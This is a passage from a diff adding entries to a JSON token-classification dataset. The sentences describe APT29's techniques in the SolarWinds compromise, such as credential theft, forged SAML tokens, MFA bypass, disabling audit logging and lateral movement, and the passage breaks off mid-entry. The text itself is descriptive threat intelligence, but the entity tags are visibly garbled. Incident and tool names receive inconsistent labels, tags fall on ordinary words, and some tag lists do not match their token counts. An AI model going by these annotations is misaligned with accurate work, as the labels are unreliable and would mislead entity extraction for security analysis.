"B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "7-Zip", + "to", + "compress", + "stolen", + "emails", + "into", + "password-protected", + "archives", + "prior", + "to", + "exfltration;", + "APT29", + "also", + "compressed", + "text", + "files", + "into", + "zipped", + "archives." + ], + "ner_tags": [ + "O", + "O", + "B-Exp", + "O", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "removed", + "evidence", + "of", + "email", + "export", + "requests", + "using", + "`Remove-MailboxExportRequest`." + ], + "ner_tags": [ + "O", + "O", + "B-Exp", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "a", + "compromised", + "O365", + "administrator", + "account", + "to", + "create", + "a", + "new", + "Service", + "Principal." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "downloaded", + "source", + "code", + "from", + "code", + "repositories." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "was", + "able", + "to", + "get", + "SUNBURST", + "signed", + "by", + "SolarWinds", + "code", + "signing", + "certificates", + "by", + "injecting", + "the", + "malware", + "into", + "the", + "SolarWinds", + "Orion", + "software", + "lifecycle." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "gained", + "initial", + "network", + "access", + "to", + "some", + "victims", + "via", + "a", + "trojanized", + "update", + "of", + "SolarWinds", + "Orion", + "software." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "For", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "conducted", + "credential", + "theft", + "operations", + "to", + "obtain", + "credentials", + "to", + "be", + "used", + "for", + "access", + "to", + "victim", + "environments." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "account", + "credentials", + "they", + "obtained", + "to", + "attempt", + "access", + "to", + "Group", + "Managed", + "Service", + "Account", + "(gMSA)", + "passwords." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "stole", + "users'", + "saved", + "passwords", + "from", + "Chrome." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "B-Exp", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "privileged", + "accounts", + "to", + "replicate", + "directory", + "service", + "data", + "with", + "domain", + "controllers." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "accessed", + "victims'", + "internal", + "knowledge", + "repositories", + "(wikis)", + "to", + "view", + "sensitive", + "corporate", + "information", + "on", + "products,", + "services,", + "and", + "internal", + "business", + "operations." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "extracted", + "files", + "from", + "compromised", + "networks." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "7-Zip", + "to", + "decode", + "their", + "Raindrop", + "malware." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "registered", + "devices", + "in", + "order", + "to", + "enable", + "mailbox", + "syncing", + "via", + "the", + "`Set-CASMailbox`", + "command." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29,", + "used", + "`AUDITPOL`", + "to", + "prevent", + "the", + "collection", + "of", + "audit", + "logs." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "`netsh`", + "to", + "configure", + "firewall", + "rules", + "that", + "limited", + "certain", + "UDP", + "outbound", + "packets." + ], + "ner_tags": [ + "O", + "O", + "B-Exp", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "the", + "service", + "control", + "manager", + "on", + "a", + "remote", + "system", + "to", + "disable", + "services", + "associated", + "with", + "security", + "monitoring", + "products." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "PowerShell", + "to", + "discover", + "domain", + "accounts", + "by", + "exectuing", + "`Get-ADUser`", + "and", + "`Get-ADGroupMember`." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "domain", + "administrators'", + "accounts", + "to", + "help", + "facilitate", + "lateral", + "movement", + "on", + "compromised", + "networks." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "AdFind", + "to", + "enumerate", + "domain", + "groups." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "the", + "`Get-AcceptedDomain`", + "PowerShell", + "cmdlet", + "to", + "enumerate", + "accepted", + "domains", + "through", + "an", + "Exchange", + "Management", + "Shell.", + "They", + "also", + "used", + "AdFind", + "to", + "enumerate", + "domains", + "and", + "to", + "discover", + "trust", + "between", + "federated", + "domains." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "acquired", + "C2", + "domains,", + "sometimes", + "through", + "resellers." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "compromised", + "domains", + "to", + "use", + "for", + "C2." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "dynamic", + "DNS", + "resolution", + "to", + "construct", + "and", + "resolve", + "to", + "randomly-generated", + "subdomains", + "for", + "C2." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "B-Exp", + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "exfiltrated", + "collected", + "data", + "over", + "a", + "simple", + "HTTPS", + "request", + "to", + "a", + "password-protected", + "archive", + "staged", + "on", + "a", + "victim's", + "OWA", + "servers." + ], + "ner_tags": [ + "O", + "O", + "B-Exp", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "exploited", + "CVE-2020-0688", + "against", + "the", + "Microsoft", + "Exchange", + "Control", + "Panel", + "to", + "regain", + "access", + "to", + "a", + "network." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "B-SecTeam", + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "compromised", + "identities", + "to", + "access", + "networks", + "via", + "SSH,", + "VPNs,", + "and", + "other", + "remote", + "access", + "tools." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "routinely", + "removed", + "their", + "tools,", + "including", + "custom", + "backdoors,", + "once", + "remote", + "access", + "was", + "achieved." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "obtained", + "information", + "about", + "the", + "configured", + "Exchange", + "virtual", + "directory", + "using", + "`Get-WebServicesVirtualDirectory`." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "set", + "the", + "hostnames", + "of", + "their", + "C2", + "infrastructure", + "to", + "match", + "legitimate", + "hostnames", + "in", + "the", + "victim", + "environment.", + "They", + "also", + "used", + "IP", + "addresses", + "originating", + "from", + "the", + "same", + "country", + "as", + "the", + "victim", + "for", + "their", + "VPN", + "infrastructure." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "temporarily", + "replaced", + "legitimate", + "utilities", + "with", + "their", + "own,", + "executed", + "their", + "payload,", + "and", + "then", + "restored", + "the", + "original", + "file." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "B-Idus", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "downloaded", + "additional", + "malware,", + "such", + "as", + "TEARDROP", + "and", + "Cobalt", + "Strike,", + "onto", + "a", + "compromised", + "host", + "following", + "initial", + "access." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "B-Exp", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "SSH", + "port", + "forwarding", + "capabilities", + "on", + "public-facing", + "systems,", + "and", + "configured", + "at", + "least", + "one", + "instance", + "of", + "Cobalt", + "Strike", + "to", + "use", + "a", + "network", + "pipe", + "over", + "SMB." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "GoldFinder", + "to", + "perform", + "HTTP", + "GET", + "requests", + "to", + "check", + "internet", + "connectivity", + "and", + "identify", + "HTTP", + "proxy", + "servers", + "and", + "other", + "redirectors", + "that", + "an", + "HTTP", + "request", + "travels", + "through." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "obtained", + "Ticket", + "Granting", + "Service", + "(TGS)", + "tickets", + "for", + "Active", + "Directory", + "Service", + "Principle", + "Names", + "to", + "crack", + "offline." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "compromised", + "local", + "accounts", + "to", + "access", + "victims'", + "networks." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "numerous", + "pieces", + "of", + "malware", + "that", + "were", + "likely", + "developed", + "for", + "or", + "by", + "the", + "group,", + "including", + "SUNBURST,", + "SUNSPOT,", + "Raindrop,", + "and", + "TEARDROP." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "named", + "tasks", + "`\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager`", + "in", + "order", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "renamed", + "software", + "and", + "DLLs", + "with", + "legitimate", + "names", + "to", + "appear", + "benign." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "the", + "`Get-ManagementRoleAssignment`", + "PowerShell", + "cmdlet", + "to", + "enumerate", + "Exchange", + "management", + "role", + "assignments", + "through", + "an", + "Exchange", + "Management", + "Shell." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "PowerShell", + "to", + "create", + "new", + "tasks", + "on", + "remote", + "machines,", + "identify", + "configuration", + "settings,", + "exfiltrate", + "data,", + "and", + "execute", + "other", + "commands." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "obtained", + "PKI", + "keys,", + "certificate", + "files,", + "and", + "the", + "private", + "encryption", + "key", + "from", + "an", + "Active", + "Directory", + "Federation", + "Services", + "(AD", + "FS)", + "container", + "to", + "decrypt", + "corresponding", + "SAML", + "signing", + "certificates." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "multiple", + "command-line", + "utilities", + "to", + "enumerate", + "running", + "processes." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "staged", + "data", + "and", + "files", + "in", + "password-protected", + "archives", + "on", + "a", + "victim's", + "OWA", + "server." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "RDP", + "sessions", + "from", + "public-facing", + "systems", + "to", + "internal", + "servers." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "collected", + "emails", + "from", + "specific", + "individuals,", + "such", + "as", + "executives", + "and", + "IT", + "staff,", + "using", + "`New-MailboxExportRequest`", + "followed", + "by", + "`Get-MailboxExportRequest`." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "B-Org", + "O", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "AdFind", + "to", + "enumerate", + "remote", + "systems." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "`Rundll32.exe`", + "to", + "execute", + "payloads." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "created", + "tokens", + "using", + "compromised", + "SAML", + "signing", + "certificates." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "administrative", + "accounts", + "to", + "connect", + "over", + "SMB", + "to", + "targeted", + "users." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "`scheduler`", + "and", + "`schtasks`", + "to", + "create", + "new", + "tasks", + "on", + "remote", + "host", + "as", + "part", + "of", + "their", + "lateral", + "movement.", + "They", + "manipulated", + "scheduled", + "tasks", + "by", + "updating", + "an", + "existing", + "legitimate", + "task", + "to", + "execute", + "their", + "tools", + "and", + "then", + "returned", + "the", + "scheduled", + "task", + "to", + "its", + "original", + "configuration.", + "APT29", + "also", + "created", + "a", + "scheduled", + "task", + "to", + "maintain", + "SUNSPOT", + "persistence", + "when", + "the", + "host", + "booted." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "stole", + "Chrome", + "browser", + "cookies", + "by", + "copying", + "the", + "Chrome", + "profile", + "directories", + "of", + "targeted", + "users." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Exp", + "B-Idus", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "`fsutil`", + "to", + "check", + "available", + "free", + "space", + "before", + "executing", + "actions", + "that", + "might", + "create", + "large", + "files", + "on", + "disk." + ], + "ner_tags": [ + "O", + "O", + "B-Exp", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "modified", + "timestamps", + "of", + "backdoors", + "to", + "match", + "legitimate", + "Windows", + "files." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "changed", + "domain", + "federation", + "trust", + "settings", + "using", + "Azure", + "AD", + "administrative", + "permissions", + "to", + "configure", + "the", + "domain", + "to", + "accept", + "authorization", + "tokens", + "signed", + "by", + "their", + "own", + "SAML", + "signing", + "certificate." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "gained", + "access", + "through", + "compromised", + "accounts", + "at", + "cloud", + "solution", + "partners,", + "and", + "used", + "compromised", + "certificates", + "issued", + "by", + "Mimecast", + "to", + "authenticate", + "to", + "Mimecast", + "customer", + "systems." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "forged", + "SAML", + "tokens", + "that", + "allowed", + "the", + "actors", + "to", + "impersonate", + "users", + "and", + "bypass", + "MFA,", + "enabling", + "APT29", + "to", + "access", + "enterprise", + "cloud", + "applications", + "and", + "services." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Idus", + "O", + "I-Tool", + "O", + "B-Tool", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "different", + "compromised", + "credentials", + "for", + "remote", + "access", + "and", + "to", + "move", + "laterally." + ], + "ner_tags": [ + "O", + "O", + "B-Exp", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "wrote", + "malware", + "such", + "as", + "Sibot", + "in", + "Visual", + "Basic." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "bypassed", + "MFA", + "set", + "on", + "OWA", + "accounts", + "by", + "generating", + "a", + "cookie", + "value", + "from", + "a", + "previously", + "stolen", + "secret", + "key." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "HTTP", + "for", + "C2", + "and", + "data", + "exfiltration." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "B-OffAct", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "stolen", + "cookies", + "to", + "access", + "cloud", + "resources", + "and", + "a", + "forged", + "`duo-sid`", + "cookie", + "to", + "bypass", + "MFA", + "set", + "on", + "an", + "email", + "account." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "`cmd.exe`", + "to", + "execute", + "commands", + "on", + "remote", + "machines." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "WMI", + "for", + "the", + "remote", + "execution", + "of", + "files", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "B-Tool", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "a", + "WMI", + "event", + "filter", + "to", + "invoke", + "a", + "command-line", + "event", + "consumer", + "at", + "system", + "boot", + "time", + "to", + "launch", + "a", + "backdoor", + "with", + "`rundll32.exe`." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "SolarWinds", + "Compromise,", + "APT29", + "used", + "WinRM", + "via", + "PowerShell", + "to", + "execute", + "commands", + "and", + "payloads", + "on", + "remote", + "hosts." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "the", + "Triton", + "Safety", + "Instrumented", + "System", + "Attack,", + "TEMP.Veles", + "engaged", + "in", + "network", 